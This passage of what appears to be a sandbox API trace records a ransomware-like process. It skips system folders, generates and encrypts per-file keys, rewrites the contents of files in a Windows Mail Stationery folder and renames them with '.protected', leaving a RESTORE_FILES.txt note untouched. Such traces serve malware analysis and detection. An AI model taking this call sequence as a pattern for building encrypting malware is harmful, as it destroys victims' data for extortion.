lpOverlapped=0x0) returned 1 [0094.621] CloseHandle (hObject=0x150) returned 1 [0094.622] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg.protected") returned 88 [0094.622] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\roses.jpg"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\roses.jpg.protected")) returned 1 [0094.622] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0094.622] lstrcmpiW (lpString1="Shades of Blue.htm", lpString2="Windows") returned -1 [0094.622] lstrcmpiW (lpString1="Shades of Blue.htm", lpString2="Program Files") returned 1 [0094.622] lstrcmpiW (lpString1="Shades of Blue.htm", lpString2="Program Files (x86)") returned 1 [0094.622] lstrcmpiW (lpString1="Shades of Blue.htm", lpString2="$Recycle.bin") returned 1 [0094.622] lstrcmpiW (lpString1="Shades of Blue.htm", lpString2="System Volume Information") returned -1 [0094.623] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Shades of Blue.htm") returned 87 [0094.623] StrStrIW (lpFirst="Shades of Blue.htm", lpSrch=".protected") returned 0x0 [0094.623] lstrcmpW (lpString1="Shades of Blue.htm", lpString2="RESTORE_FILES.txt") returned 1 [0094.623] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0094.623] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0094.623] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Shades of Blue.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\shades of blue.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0094.623] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Shades of Blue.htm") returned 87 [0094.623] StrStrW (lpFirst="Shades of Blue.htm", lpSrch=".txt") returned 0x0 [0094.623] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Shades of Blue.htm") returned 87 [0094.623] StrStrW (lpFirst="Shades of Blue.htm", lpSrch=".rar") returned 0x0 [0094.623] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Shades of Blue.htm") returned 87 [0094.623] StrStrW (lpFirst="Shades of Blue.htm", lpSrch=".zip") returned 0x0 [0094.623] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0xed, lpOverlapped=0x0) returned 1 [0094.624] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffff13, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.624] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0xed, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0xed, lpOverlapped=0x0) returned 1 [0094.624] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.624] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0094.625] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0094.625] CloseHandle (hObject=0x150) returned 1 [0094.625] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Shades of Blue.htm.protected") returned 97 [0094.625] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Shades of Blue.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\shades of blue.htm"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Shades of Blue.htm.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\shades of blue.htm.protected")) returned 1 [0094.625] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0094.625] lstrcmpiW (lpString1="ShadesOfBlue.jpg", lpString2="Windows") returned -1 [0094.625] lstrcmpiW (lpString1="ShadesOfBlue.jpg", lpString2="Program Files") returned 1 [0094.626] lstrcmpiW (lpString1="ShadesOfBlue.jpg", lpString2="Program Files (x86)") returned 1 [0094.626] lstrcmpiW (lpString1="ShadesOfBlue.jpg", lpString2="$Recycle.bin") returned 1 [0094.626] lstrcmpiW (lpString1="ShadesOfBlue.jpg", lpString2="System Volume Information") returned -1 [0094.626] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg") returned 85 [0094.626] StrStrIW (lpFirst="ShadesOfBlue.jpg", lpSrch=".protected") returned 0x0 [0094.626] lstrcmpW (lpString1="ShadesOfBlue.jpg", lpString2="RESTORE_FILES.txt") returned 1 [0094.626] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0094.626] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0094.626] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\shadesofblue.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0094.626] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg") returned 85 [0094.626] StrStrW (lpFirst="ShadesOfBlue.jpg", lpSrch=".txt") returned 0x0 [0094.626] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg") returned 85 [0094.626] StrStrW (lpFirst="ShadesOfBlue.jpg", lpSrch=".rar") returned 0x0 [0094.626] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg") returned 85 [0094.626] StrStrW (lpFirst="ShadesOfBlue.jpg", lpSrch=".zip") returned 0x0 [0094.626] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0x127e, lpOverlapped=0x0) returned 1 [0094.633] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffed82, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.633] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0x127e, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0x127e, lpOverlapped=0x0) returned 1 [0094.633] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.633] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0094.633] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0094.633] CloseHandle (hObject=0x150) returned 1 [0094.634] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg.protected") returned 95 [0094.634] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\shadesofblue.jpg"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\shadesofblue.jpg.protected")) returned 1 [0094.634] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0094.634] lstrcmpiW (lpString1="Soft Blue.htm", lpString2="Windows") returned -1 [0094.635] lstrcmpiW (lpString1="Soft Blue.htm", lpString2="Program Files") returned 1 [0094.635] lstrcmpiW (lpString1="Soft Blue.htm", lpString2="Program Files (x86)") returned 1 [0094.635] lstrcmpiW (lpString1="Soft Blue.htm", lpString2="$Recycle.bin") returned 1 [0094.635] lstrcmpiW (lpString1="Soft Blue.htm", lpString2="System Volume Information") returned -1 [0094.635] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Soft Blue.htm") returned 82 [0094.635] StrStrIW (lpFirst="Soft Blue.htm", lpSrch=".protected") returned 0x0 [0094.635] lstrcmpW (lpString1="Soft Blue.htm", lpString2="RESTORE_FILES.txt") returned 1 [0094.635] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0094.635] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0094.635] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Soft Blue.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\soft blue.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0094.635] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Soft Blue.htm") returned 82 [0094.635] StrStrW (lpFirst="Soft Blue.htm", lpSrch=".txt") returned 0x0 [0094.635] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Soft Blue.htm") returned 82 [0094.635] StrStrW (lpFirst="Soft Blue.htm", lpSrch=".rar") returned 0x0 [0094.636] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Soft Blue.htm") returned 82 [0094.636] StrStrW (lpFirst="Soft Blue.htm", lpSrch=".zip") returned 0x0 [0094.636] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0xe8, lpOverlapped=0x0) returned 1 [0094.636] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffff18, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.637] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0xe8, lpOverlapped=0x0) returned 1 [0094.637] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.637] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0094.637] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0094.637] CloseHandle (hObject=0x150) returned 1 [0094.637] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Soft Blue.htm.protected") returned 92 [0094.637] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Soft Blue.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\soft blue.htm"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Soft Blue.htm.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\soft blue.htm.protected")) returned 1 [0094.638] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0094.638] lstrcmpiW (lpString1="SoftBlue.jpg", lpString2="Windows") returned -1 [0094.638] lstrcmpiW (lpString1="SoftBlue.jpg", lpString2="Program Files") returned 1 [0094.638] lstrcmpiW (lpString1="SoftBlue.jpg", lpString2="Program Files (x86)") returned 1 [0094.638] lstrcmpiW (lpString1="SoftBlue.jpg", lpString2="$Recycle.bin") returned 1 [0094.638] lstrcmpiW (lpString1="SoftBlue.jpg", lpString2="System Volume Information") returned -1 [0094.638] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg") returned 81 [0094.638] StrStrIW (lpFirst="SoftBlue.jpg", lpSrch=".protected") returned 0x0 [0094.639] lstrcmpW (lpString1="SoftBlue.jpg", lpString2="RESTORE_FILES.txt") returned 1 [0094.639] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0094.639] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0094.639] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\softblue.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0094.639] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg") returned 81 [0094.639] StrStrW (lpFirst="SoftBlue.jpg", lpSrch=".txt") returned 0x0 [0094.639] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg") returned 81 [0094.639] StrStrW (lpFirst="SoftBlue.jpg", lpSrch=".rar") returned 0x0 [0094.639] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg") returned 81 [0094.639] StrStrW (lpFirst="SoftBlue.jpg", lpSrch=".zip") returned 0x0 [0094.639] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0094.642] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.642] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0094.642] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.642] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0094.642] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0094.643] CloseHandle (hObject=0x150) returned 1 [0094.643] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg.protected") returned 91 [0094.643] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\softblue.jpg"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\softblue.jpg.protected")) returned 1 [0094.644] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0094.644] lstrcmpiW (lpString1="Stars.htm", lpString2="Windows") returned -1 [0094.644] lstrcmpiW (lpString1="Stars.htm", lpString2="Program Files") returned 1 [0094.644] lstrcmpiW (lpString1="Stars.htm", lpString2="Program Files (x86)") returned 1 [0094.644] lstrcmpiW (lpString1="Stars.htm", lpString2="$Recycle.bin") returned 1 [0094.644] lstrcmpiW (lpString1="Stars.htm", lpString2="System Volume Information") returned -1 [0094.644] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.htm") returned 78 [0094.644] StrStrIW (lpFirst="Stars.htm", lpSrch=".protected") returned 0x0 [0094.644] lstrcmpW (lpString1="Stars.htm", lpString2="RESTORE_FILES.txt") returned 1 [0094.644] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0094.644] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0094.644] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\stars.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0094.645] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.htm") returned 78 [0094.645] StrStrW (lpFirst="Stars.htm", lpSrch=".txt") returned 0x0 [0094.645] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.htm") returned 78 [0094.645] StrStrW (lpFirst="Stars.htm", lpSrch=".rar") returned 0x0 [0094.645] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.htm") returned 78 [0094.645] StrStrW (lpFirst="Stars.htm", lpSrch=".zip") returned 0x0 [0094.645] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0xe6, lpOverlapped=0x0) returned 1 [0094.646] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffff1a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.646] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0xe6, lpOverlapped=0x0) returned 1 [0094.646] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.646] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0094.646] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0094.646] CloseHandle (hObject=0x150) returned 1 [0094.646] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.htm.protected") returned 88 [0094.647] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\stars.htm"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.htm.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\stars.htm.protected")) returned 1 [0094.647] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0094.648] lstrcmpiW (lpString1="Stars.jpg", lpString2="Windows") returned -1 [0094.648] lstrcmpiW (lpString1="Stars.jpg", lpString2="Program Files") returned 1 [0094.648] lstrcmpiW (lpString1="Stars.jpg", lpString2="Program Files (x86)") returned 1 [0094.648] lstrcmpiW (lpString1="Stars.jpg", lpString2="$Recycle.bin") returned 1 [0094.648] lstrcmpiW (lpString1="Stars.jpg", lpString2="System Volume Information") returned -1 [0094.648] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg") returned 78 [0094.648] StrStrIW (lpFirst="Stars.jpg", lpSrch=".protected") returned 0x0 [0094.648] lstrcmpW (lpString1="Stars.jpg", lpString2="RESTORE_FILES.txt") returned 1 [0094.648] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0094.648] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0094.648] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\stars.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0094.649] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg") returned 78 [0094.649] StrStrW (lpFirst="Stars.jpg", lpSrch=".txt") returned 0x0 [0094.649] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg") returned 78 [0094.649] StrStrW (lpFirst="Stars.jpg", lpSrch=".rar") returned 0x0 [0094.649] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg") returned 78 [0094.649] StrStrW (lpFirst="Stars.jpg", lpSrch=".zip") returned 0x0 [0094.649] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0x1d51, lpOverlapped=0x0) returned 1 [0094.651] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffe2af, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.651] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0x1d51, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0x1d51, lpOverlapped=0x0) returned 1 [0094.651] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.651] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, 